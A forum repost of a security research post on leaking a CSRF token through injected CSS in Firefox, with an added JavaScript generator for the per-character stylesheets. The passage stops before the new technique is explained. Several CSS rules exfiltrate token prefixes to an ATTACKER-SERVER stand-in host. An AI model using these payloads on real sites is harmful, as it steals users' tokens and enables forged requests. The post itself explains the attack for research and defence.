[Repost] CSS data exfiltration in Firefox via a single injection point
Posted: 2020-2-14 10:51 (2103 views)


Original link: https://research.securitum.com/css-data-exfiltration-in-firefox-via-single-injection-point/


A few months ago I identified a security issue in Firefox, tracked as CVE-2019-17016. While analysing it, I came up with a new technique for CSS data exfiltration in Firefox through a single injection point, which I'm going to share in this blog post.

Basics and prior art

For the sake of the examples, assume that we want to leak a CSRF token stored in the value attribute of an <input> element:

<input type="hidden" name="csrftoken" value="SOME_VALUE">

We cannot run scripts (perhaps because of CSP), so we have to settle for style injection. The classic approach uses attribute selectors, with one rule per candidate first character (only three of the rules are shown; in practice there is one for every character of the token alphabet):

input[name='csrftoken'][value^='a'] {
  background: url(//ATTACKER-SERVER/leak/a);
}

input[name='csrftoken'][value^='b'] {  
  background: url(//ATTACKER-SERVER/leak/b); 
}

input[name='csrftoken'][value^='z'] {  
  background: url(//ATTACKER-SERVER/leak/z); 
}

Exactly one of these rules can match, and when it does the browser fetches the background image, so the attacker receives an HTTP request whose path leaks the first character of the token. (A practitioner's caveat: the browser's UA stylesheet gives type="hidden" inputs display: none, and no background is fetched for a hidden element, so in real payloads the background is usually attached to a sibling instead, e.g. input[name='csrftoken'][value^='a'] ~ * { ... }.) Next, another stylesheet has to be prepared whose prefixes start with the character just learned, for instance:

input[name='csrftoken'][value^='aa'] {
  background: url(//ATTACKER-SERVER/leak/aa); 
} 

input[name='csrftoken'][value^='ab'] {  
  background: url(//ATTACKER-SERVER/leak/ab); 
}

input[name='csrftoken'][value^='az'] {  
  background: url(//ATTACKER-SERVER/leak/az); 
}

It was usually assumed that each subsequent stylesheet has to be delivered by reloading the victim page inside an <iframe> with a fresh injection, i.e. one page load per leaked character.
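The following is an added example, not code from the original post: it generates the per-round stylesheets of the classic attribute-selector technique described above and simulates the leak loop that drives them, so the cost of the approach (one stylesheet and one page reload per character) is visible in code. The attacker host name, the token alphabet and the sample token values are assumptions.

```javascript
// Added example (not part of the original article). The attacker host,
// alphabet and sample tokens below are assumptions for illustration.
const ATTACKER = "//ATTACKER-SERVER/leak/";
const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789";

// Build the stylesheet for one round: one rule per candidate next
// character, each candidate prefixed with what has already been leaked.
// Only one rule can match, because the candidates differ in their last char.
function buildStylesheet(prefix, alphabet = ALPHABET, attacker = ATTACKER) {
  return [...alphabet]
    .map((ch) => {
      const guess = prefix + ch;
      return (
        `input[name='csrftoken'][value^='${guess}'] ` +
        `{ background: url(${attacker}${guess}); }`
      );
    })
    .join("\n");
}

// Emulate the browser's selector matching: which [value^=...] candidate
// matches the real token value? Returns the leaked prefix (the URL path
// the attacker would see) or null when no rule fires.
function matchingLeak(tokenValue, prefix, alphabet = ALPHABET) {
  for (const ch of alphabet) {
    const guess = prefix + ch;
    if (tokenValue.startsWith(guess)) return guess;
  }
  return null;
}

// The classic loop: every round needs a fresh stylesheet (in the original
// technique, a reload of the victim page in an <iframe>) and yields at most
// one callback. The loop stops when no rule fires: either the whole token
// has been recovered or the next character is outside the alphabet.
function exfiltrate(tokenValue, alphabet = ALPHABET) {
  let known = "";
  const stylesheets = [];
  for (;;) {
    stylesheets.push(buildStylesheet(known, alphabet));
    const leaked = matchingLeak(tokenValue, known, alphabet);
    if (leaked === null) break;
    known = leaked;
  }
  // rounds = token length + 1: the final stylesheet produces no request.
  return { token: known, rounds: stylesheets.length, stylesheets };
}

module.exports = { buildStylesheet, matchingLeak, exfiltrate };
```

Note that a character outside the chosen alphabet (for example "-" in a base64url token) silently ends the leak with a truncated value; the alphabet must cover the token's real character set, and in practice the attacker also has to deal with hidden inputs not being rendered, as noted above.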


In 2018 Pepe Vila came up with an impressive concept that achieves the same thing in Chrome with a single injection point, by abusing recursive CSS @import. The same trick was rediscovered in 2019 by Nathanial Lattimer (aka @d0nutptr), with a slight variation. I'll summarize Lattimer's approach below, because it is closer to what I came up with in Firefox, even though (funnily enough) I wasn't aware of Lattimer's research when doing my own. So one could say that I rediscovered a rediscovery...

Replies (1)
Thanks for sharing.
2020-2-14 12:46